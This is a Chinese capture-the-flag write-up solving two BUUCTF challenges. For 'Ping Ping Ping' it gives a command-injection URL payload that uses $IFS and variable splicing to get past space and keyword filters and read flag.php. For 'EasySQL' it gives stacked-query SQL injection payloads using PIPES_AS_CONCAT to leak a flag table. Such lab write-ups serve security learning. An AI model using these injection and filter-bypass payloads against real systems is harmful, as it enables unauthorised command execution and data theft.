[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

学习中的DGR2026-01-23 22:39

1、 $GXYCTF2019$ Ping Ping Ping 1

我们直接查看flag.php，提示我们/?ip= fxck your space!，无法直接查看flag.php，需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、 $SUCTF 2019$ EasySQL 1

随便输入一个数字回显Array ( $0$ => 1 )，输入其他内容回显Nonono。

猜测该系统后台代码为：select $_POST $'query'$ || flag from flag $1$ ，且那么直接在1前面拼接*，即*,1，解得flag：

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为：1;set sql_mode=PIPES_AS_CONCAT;select 1 ，相当于是将select 1 和 select flag from Flag 的结果拼接在一起，也就是 select 1;的结果拼接select flag from Flag的结果。

上一篇：wordpress开发公司推荐

下一篇：MFC扩展库BCGControlBar Pro v37.2 - 全新的VS 2026可视化管理器

热门推荐

01GitHub 镜像站点 02【AI】2026 年具身智能模型和世界模型总结 03Codex 下载安装指南：Windows 和 macOS 官方版下载 042026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 052026 AI 编程工具终极实战指南：Cursor vs Claude Code vs Copilot，开发者该怎么选？06【踩坑记录 | 第一篇】微软商店无法使用时，如何手动安装 OpenAI Codex？附`.msix`文件系统错误解决方法 07CC-Switch 下载、安装与使用配置指南【2026.5.29】08Agnes AI 全模态 API 免费实测报告：文生图 + 文生视频完整测试 09CC-Switch & Claude 基于 Linux 服务器安装使用指南 10AI科技热点日报 | 2026年6月1日